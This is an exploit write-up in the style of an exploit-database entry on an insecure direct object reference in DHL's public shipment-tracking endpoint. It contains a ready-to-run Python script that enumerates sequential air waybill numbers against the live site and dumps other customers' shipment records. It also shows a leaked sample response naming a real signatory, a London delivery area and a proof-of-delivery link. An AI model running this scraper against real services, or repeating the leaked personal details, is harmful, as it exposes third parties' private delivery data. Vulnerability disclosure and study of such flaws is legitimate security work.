Exploit Title: DHL.com - Insecure Direct Object Reference (IDOR)
Exploit Author: Nir Yehoshua
Exploit Date: 2020-04-05
Link to vulnerable website: https://www.DHL.com
Category: Web Application
Details: The public shipment-tracking endpoint (`/shipmentTracking?AWB=…`) accepts a sequential air waybill (AWB) number with no authentication or ownership check. Because AWB numbers are assigned consecutively, an unauthenticated client can enumerate them and retrieve other customers' shipment details — delivery status, origin and destination service areas, the name of the person who signed for the parcel and a proof-of-delivery link (see the sample response below). This is a classic Insecure Direct Object Reference leading to sensitive information disclosure.
Proof of Concept (Python):
=============================
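# DHL.com IDOR - By Nir Yehoshua
#
# Enumerates consecutive air waybill (AWB) numbers against the public
# shipment-tracking endpoint and prints every response that is not the
# endpoint's "404 / not found" reply.  Each hit contains another customer's
# shipment data (delivery status, service areas, signatory name and a
# proof-of-delivery link), so run this only against systems you are
# authorised to test and do not retain the output longer than needed.
#
# Python 3 port of the original Python 2 PoC (`print JsonResponse`,
# substring test on bytes `.content`).  Adds a request timeout and a
# per-request delay; the probing logic is separated from the network call
# so it can be exercised without touching the live endpoint.
import sys
import time

# Same query string as the original PoC; only the AWB number varies.
TRACKING_URL = 'https://www.dhl.com/shipmentTracking?AWB=%d&countryCode=g0&languageCode=en&_=1'

# Range probed by the original PoC (200 consecutive AWB numbers).
DEFAULT_START = 4357790500
DEFAULT_STOP = 4357790700


def build_url(number):
    """Return the tracking URL for one AWB number."""
    return TRACKING_URL % number


def _as_text(body):
    """Return `body` as str (bytes are decoded as UTF-8, bad sequences replaced)."""
    if isinstance(body, bytes):
        return body.decode('utf-8', 'replace')
    return body


def is_not_found(body):
    """True when `body` is the endpoint's not-found reply.

    Keeps the original PoC's heuristic: the not-found reply contains the
    substring '404'.  Accepts bytes or str so both `resp.content` and
    `resp.text` work.  NOTE(review): a valid shipment whose piece ID or
    timestamp happens to contain "404" would be skipped as well; if the
    not-found reply has a stable JSON shape, match on that instead.
    """
    return '404' in _as_text(body)


def enumerate_awbs(start, stop, fetch, delay=0.5, out=sys.stdout):
    """Probe AWB numbers in range(start, stop) and write every non-404 body to `out`.

    fetch -- callable taking a URL and returning the response body (bytes or
             str); injected so the logic can be tested without network access.
    delay -- seconds to sleep after each request, to stay well below any rate
             limit and avoid hammering a production endpoint (0 disables it).
    out   -- file-like object that hit bodies are written to, one per line.
    Returns the list of AWB numbers that produced a hit.
    """
    hits = []
    for number in range(start, stop):
        body = fetch(build_url(number))
        if not is_not_found(body):
            out.write(_as_text(body) + '\n')
            hits.append(number)
        if delay:
            time.sleep(delay)
    return hits


def main():
    """Run the scan over the original PoC range using `requests`."""
    # Third-party; imported lazily so the helpers above import without it.
    import requests

    session = requests.Session()

    def fetch(url):
        # Timeout added: the original requests.get() call could hang forever.
        resp = session.get(url, timeout=15)
        return resp.text

    hits = enumerate_awbs(DEFAULT_START, DEFAULT_STOP, fetch)
    print('%d hit(s) in %d AWB numbers' % (len(hits), DEFAULT_STOP - DEFAULT_START), file=sys.stderr)


if __name__ == '__main__':
    main()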
=============================
Example of a valid response for AWB 4357790500 (returned to an unauthenticated client; note the signatory name, destination service area and proof-of-delivery link):
{
"results" : [ {
"id" : "4357790500",
"label" : "Waybill",
"type" : "airwaybill",
"duplicate" : false,
"delivery" : {
"code" : "101",
"status" : "delivered"
},
"origin" : {
"value" : "HARRISBURG, PA - GAP - USA",
"label" : "Origin Service Area",
"url" : "http://www.dhl-usa.com/en/country_profile.html"
},
"destination" : {
"value" : "CITY OF LONDON - LONDON - UK",
"label" : "Destination Service Area",
"url" : "http://www.dhl.co.uk/en/country_profile.html"
},
"description" : "Signed for by: KRYSTAL HUR Tuesday, March 03, 2020 at 15:56",
"hasDuplicateShipment" : false,
"signature" : {
"link" : {
"url" : "https://webpod.dhl.com/webPOD/DHLePODRequest?hwb=dSr%2FLV2ZeScSG3VC9RfKCw%3D%3D&pudate=QDxjVknMdDhAOW9Lo2HVuw%3D%3D&appuid=ex5GbwXugFsa4OwbVVA2iA%3D%3D&language=en&country=G0",
"label" : "Get Proof of Delivery"
},
"type" : "epod",
"description" : "Tuesday, March 03, 2020 at 15:56",
"signatory" : "KRYSTAL HUR",
"label" : "Signed for by",
"help" : "help"
},
"pieces" : {
"value" : 1,
"label" : "Piece",
"showSummary" : true,
"pIds" : [ "JD014600007709654134" ]
},
"checkpoints" : [ {
"counter" : 26,
"description" : "Delivered - Signed for by: KRYSTAL HUR",
"time" : "15:56",
"date" : "Tuesday, March 03, 2020 ",
"location" : "LONDON "
}, {
"counter" : 25,
"description" : "Awaiting collection by recipient as requested",
"time" : "10:52",
"date" : "Thursday, February 27, 2020 ",
"location" : "CITY OF LONDON - UK"
}, {
"counter" : 24,
"description" : "With delivery courier",
"time" : "09:04",
"date" : "Thursday, February 27, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 23,
"description" : "Scheduled for delivery as agreed",
"time" : "17:00",
"date" : "Wednesday, February 26, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 22,
"description" : "Shipment on hold",
"time" : "09:46",
"date" : "Wednesday, February 26, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 21,
"description" : "Shipment on hold",
"time" : "19:45",
"date" : "Tuesday, February 25, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 20,
"description" : "Delivery attempted; recipient not home",
"time" : "18:20",
"date" : "Tuesday, February 25, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 19,
"description" : "With delivery courier",
"time" : "09:31",
"date" : "Tuesday, February 25, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 18,
"description" : "Delivery attempted; recipient not home",
"time" : "19:08",
"date" : "Monday, February 24, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 17,
"description" : "With delivery courier",
"time" : "09:47",
"date" : "Monday, February 24, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 16,
"description" : "Arrived at Delivery Facility in CITY OF LONDON - UK",
"time" : "06:11",
"date" : "Monday, February 24, 2020 ",
"location" : "CITY OF LONDON - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 15,
"description" : "Departed Facility in LONDON-HEATHROW - UK",
"time" : "04:29",
"date" : "Monday, February 24, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 14,
"description" : "Processed at LONDON-HEATHROW - UK",
"time" : "22:42",
"date" : "Sunday, February 23, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 13,
"description" : "Clearance processing complete at LONDON-HEATHROW - UK",
"time" : "22:32",
"date" : "Sunday, February 23, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 12,
"description" : "Arrived at Sort Facility LONDON-HEATHROW - UK",
"time" : "17:43",
"date" : "Sunday, February 23, 2020 ",
"location" : "LONDON-HEATHROW - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 11,
"description" : "Departed Facility in EAST MIDLANDS - UK",
"time" : "14:32",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 10,
"description" : "Transferred through EAST MIDLANDS - UK",
"time" : "14:32",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 9,
"description" : "Clearance processing complete at EAST MIDLANDS - UK",
"time" : "14:15",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK"
}, {
"counter" : 8,
"description" : "Shipment not arrived; customs status updated",
"time" : "00:03",
"date" : "Sunday, February 23, 2020 ",
"location" : "EAST MIDLANDS - UK"
}, {
"counter" : 7,
"description" : "Departed Facility in NEW YORK CITY GATEWAY - USA",
"time" : "16:39",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 6,
"description" : "Processed at NEW YORK CITY GATEWAY - USA",
"time" : "14:53",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 5,
"description" : "Processed at NEW YORK CITY GATEWAY - USA",
"time" : "01:33",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 4,
"description" : "Arrived at Sort Facility NEW YORK CITY GATEWAY - USA",
"time" : "01:14",
"date" : "Saturday, February 22, 2020 ",
"location" : "NEW YORK CITY GATEWAY, NY - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 3,
"description" : "Departed Facility in WEST PHILADELPHIA - USA",
"time" : "23:38",
"date" : "Friday, February 21, 2020 ",
"location" : "WEST PHILADELPHIA, PA - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 2,
"description" : "Processed at WEST PHILADELPHIA - USA",
"time" : "23:37",
"date" : "Friday, February 21, 2020 ",
"location" : "WEST PHILADELPHIA, PA - USA",
"totalPieces" : 1,
"pIds" : [ "JD014600007709654134" ]
}, {
"counter" : 1,
"description" : "Shipment information received",
"time" : "09:37",
"date" : "Friday, February 21, 2020 ",
"location" : "HARRISBURG, PA - USA"
} ],
"checkpointLocationLabel" : "Location",
"checkpointTimeLabel" : "Time"
} ]
}